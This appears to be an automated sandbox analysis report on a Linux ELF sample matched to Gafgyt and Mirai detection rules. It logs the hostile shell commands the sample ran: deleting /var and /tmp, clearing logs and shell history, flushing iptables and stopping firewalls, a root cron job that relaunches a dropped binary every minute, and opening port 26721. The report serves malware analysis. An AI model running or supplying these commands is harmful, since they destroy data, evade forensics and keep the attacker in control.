Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engine Classification label: mal96.spre.troj.evad.linELF@0/2@49/0

Data Obfuscation

barindex
Source: /tmp/x86.elf (PID: 5558) Written: /dev/ocmount Jump to behavior

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5850) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5870) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/fusermount (PID: 5684) File: /proc/5684/mounts Jump to behavior
Source: /bin/sh (PID: 5581) File: /etc/cron.d/mount.sh Jump to behavior
Source: /usr/sbin/service (PID: 5527) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5527) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/php/.. Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/snapd/assertions/asserts-v0/.. Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/snapd/assertions/.. Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/snapd/.. Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/colord/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Source: /usr/bin/rm (PID: 5494) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1583/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1583/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/2672/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/2672/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1577/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1577/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/917/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/917/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/19/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/19/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1593/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1593/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/240/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/240/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3094/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3094/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/242/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/242/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3406/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3406/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/244/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/244/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1589/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1589/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/245/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/245/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1588/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/1588/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/125/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/125/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/4/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/246/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/246/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3402/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/3402/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/126/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/126/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/5/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/5/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/247/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/247/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/127/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/127/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/6/status Jump to behavior
Source: /usr/bin/pkill (PID: 5510) File opened: /proc/6/cmdline Jump to behavior
Source: /tmp/x86.elf (PID: 5493) Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp" Jump to behavior
Source: /tmp/x86.elf (PID: 5502) Shell command executed: sh -c "rm -rf /tmp/*" Jump to behavior
Source: /tmp/x86.elf (PID: 5504) Shell command executed: sh -c "iptables -F" Jump to behavior
Source: /tmp/x86.elf (PID: 5509) Shell command executed: sh -c "pkill -9 busybox" Jump to behavior
Source: /tmp/x86.elf (PID: 5518) Shell command executed: sh -c "pkill -9 perl" Jump to behavior
Source: /tmp/x86.elf (PID: 5520) Shell command executed: sh -c "pkill -9 python" Jump to behavior
Source: /tmp/x86.elf (PID: 5526) Shell command executed: sh -c "service iptables stop" Jump to behavior
Source: /tmp/x86.elf (PID: 5534) Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X" Jump to behavior
Source: /tmp/x86.elf (PID: 5538) Shell command executed: sh -c "service firewall stop" Jump to behavior
Source: /tmp/x86.elf (PID: 5550) Shell command executed: sh -c "history -c" Jump to behavior
Source: /tmp/x86.elf (PID: 5551) Shell command executed: sh -c "rm -rf ~/.bash_history" Jump to behavior
Source: /tmp/x86.elf (PID: 5553) Shell command executed: sh -c "history -w" Jump to behavior
Source: /tmp/x86.elf (PID: 5559) Shell command executed: sh -c "chmod +x /dev/ocmount" Jump to behavior
Source: /tmp/x86.elf (PID: 5581) Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh" Jump to behavior
Source: /tmp/x86.elf (PID: 5631) Shell command executed: sh -c /dev/ocmount Jump to behavior
Source: /tmp/x86.elf (PID: 5841) Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5854) Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5856) Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5869) Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5872) Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5860) Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5876) Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5878) Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5880) Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/x86.elf (PID: 5882) Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /bin/sh (PID: 5580) Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmount Jump to behavior
Source: /bin/sh (PID: 5505) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 5535) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5537) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 5850) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5870) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5510) Pkill executable: /usr/bin/pkill -> pkill -9 busybox Jump to behavior
Source: /bin/sh (PID: 5519) Pkill executable: /usr/bin/pkill -> pkill -9 perl Jump to behavior
Source: /bin/sh (PID: 5523) Pkill executable: /usr/bin/pkill -> pkill -9 python Jump to behavior
Source: /bin/sh (PID: 5494) Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-jFiNWb /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-qf3lAyPpWVCU /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-OhEyzg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-8ySu1e /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-iKxwVi /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-ol8bni /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-LPFY4g /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-O3uVvg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-r702ki /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-CBTCVe /tmp/vmware-root_726-2957583432 /tmp/x86.elf /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-K5j1Of /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-sPszWi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-kdgXJf /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-EvKsMg /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-0DTUmj /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-fe4hsi 